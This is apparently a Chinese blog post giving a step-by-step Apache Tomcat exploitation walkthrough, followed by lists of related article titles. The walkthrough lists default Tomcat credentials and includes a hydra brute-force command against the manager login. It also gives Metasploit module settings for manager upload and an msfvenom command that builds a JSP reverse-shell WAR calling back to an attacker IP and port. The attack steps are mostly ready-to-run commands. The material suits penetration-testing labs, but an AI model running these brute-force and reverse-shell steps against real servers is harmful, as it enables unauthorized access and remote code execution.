Apache Tomcat 漏洞利用

---

参考链接1
参考链接2

通过对apache tomcat的枚举和利用，我们可以从中找出漏洞，然后得到shell

枚举

• 在 Tomcat6 之前的某些版本中，我们可以使用msf枚举用户：

msf> use auxiliary/scanner/http/tomcat_enum

• 常见的得到的用户名与密码是：

  • admin:admin
  • tomcat:tomcat
  • admin: NOTHING
  • admin:s3cr3t
  • tomcat:s3cr3t
  • admin:tomcat

• 当然，我们也可以使用hydra进行暴力破解

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

• 得到了用户名与密码后，我们就可以登录到 /manager/html下传输反向shell

RCE

• 我们可以使用msf，当然有时候这个并不起效果

use exploit/multi/http/tomcat_mgr_upload
show options
set RHOSTS
set RPORT 8080
set HttpPassword
set HttpUsername
set LHOST
exploit

• 当我们使用msf没有用时，我们可以自己制造一个shell传输到网页上
• 创建一个msfvenom payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=9999 -f war -o rshell.war

• 使用msf的监听模块进行监听（这有时候会收不到反弹回来的shell），或者使用nc监听端口

use exploit/multi/handler
show options
set payload java/jsp_shell_reverse_tcp
set LHOST 10.10.14.10
set LPORT 9999
exploit

• 完成这些后，我们将shell文件传输到web上，如果我们不能访问/manager/，那么就无法进行下一步
• 点击上传的文件在web中的地址，如果监听器没能收到shell，我们可以解压缩之前使用msfvenom创建的 .war 文件，将里面的 .jsp 文件上传，并且访问其网络链接

点击该文字链接，说的很全面，但是要按情况选择

Apache Tomcat 漏洞利用相关推荐

1. tomcat ajp协议安全限制绕过漏洞_国家信息安全漏洞共享平台发布Apache Tomcat漏洞安全公告...

   2月22日消息 国家信息安全漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安全公告,具体如下: 安全公告编号:CNTA-2020-0004 2020 年 1 ...

2. 网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御

   起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击 ...

3. Apache Tomcat 曝文件包含漏洞：攻击者可利用该漏洞读取webapp目录下的任意文件...

   点击上方蓝色"程序猿DD",选择"设为星标" 回复"资源"获取独家整理的学习资料! 作者 | oschina 来源 | https://ww ...

4. php x24 x65 x6d x61,Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet 漏洞利用

   Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE漏洞利用 ...

5. Apache Tomcat 文件包含漏洞（CVE-2020-1938）

   安全公告编号:CNTA-2020-0004 2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞(CNVD-2020- ...

6. Apache Tomcat 拒绝服务漏洞通告

   作者 | 360CERT 来源 | https://www.oschina.net/news/164556 报告编号:B6-2021-101501 报告来源:360CERT 报告作者:360CERT ...

7. 9 月 19 日，腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞， 分别为： 信息泄露漏洞（CVE-2017-12616）、远程代码执行漏洞（CVE-2017-12615

   9 月 19 日,腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616).远程代码执行漏洞(CVE-2017-12615 ...

8. 【通告更新】Apache Tomcat服务器文件包含漏洞安全风险通告第三次更新

   近日,奇安信CERT监测到CNVD发布了漏洞公告,对应CNVD漏洞编号:CNVD-2020-10487.CVE漏洞编号:CVE-2020-1938.CNVD漏洞公告称Apache Tomcat服务器存 ...

9. IIS Nginx Apache Tomcat 中间件漏洞

   简介 中间件(英语:Middleware)是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通.中间件处在操作系统和更高一级应用程序之间.他充当的功能是:将程序运行环境与操作系统隔离,从 ...

最新文章

1. PAT甲级排队问题合集 (持续更新中)
2. CSS美化上传按钮、checkbox和radio样式
3. XCode调试器LLDB
4. FreeRTOS--API函数
5. View,SurfaceView,SurfaceHolder
6. RavenDb中的Task异步应用.Net4
7. 高级IO（文件的读写）——并发式IO的解决方案（解决多路阻塞式IO的方案）
8. Bootstrap3 如何防止插件冲突
9. 比特币收购足球队，区块链准备登上绿茵场
10. html5与css3基础教程课件,揭秘HTML5和CSS3教学幻灯片.ppt
11. 原因及解决办法：Failed to load module “canberra-gtk-module“
12. 5G 协议 标准 下载
13. 华为ENSP安装教程
14. 消费者购买决策行为研究模型
15. 高德地图自定义地图样式
16. Python实验、函数和代码复用
17. （2015）最新破解企业QQ拦截个人QQ功能
18. 联邦学习学习笔记——论文理解《Communication-Efficient Learning of Deep Networks from Decentralized Data》
19. 带有图片的Excel信息导入
20. Kubernetes监控体系(12)-alertmanager配置钉钉和邮件告警

热门文章

1. DNS区域传输、DNS自动枚举工具dnsrecon
2. Maven中optional和scope元素的使用，你弄明白了？
3. Go语言实现邮箱验证/邮件发送
4. GMT时间、UTC时间、Unix时间戳
5. 朴素贝叶斯 拉普拉斯平滑（Laplace Smoothing）
6. 多语言环境下的开发部署问题
7. 用EasyExcel对excel表格进行读写操作
8. 切勿临渴再掘井，还需未雨先绸缪
9. js 对象不支持此属性或方法
10. awsec2服务器自动扣款吗,大厂风范 – AWS服务自动扣款$46.75 美元申请退款成功！ – IT Lab Service – Bing哥的博客...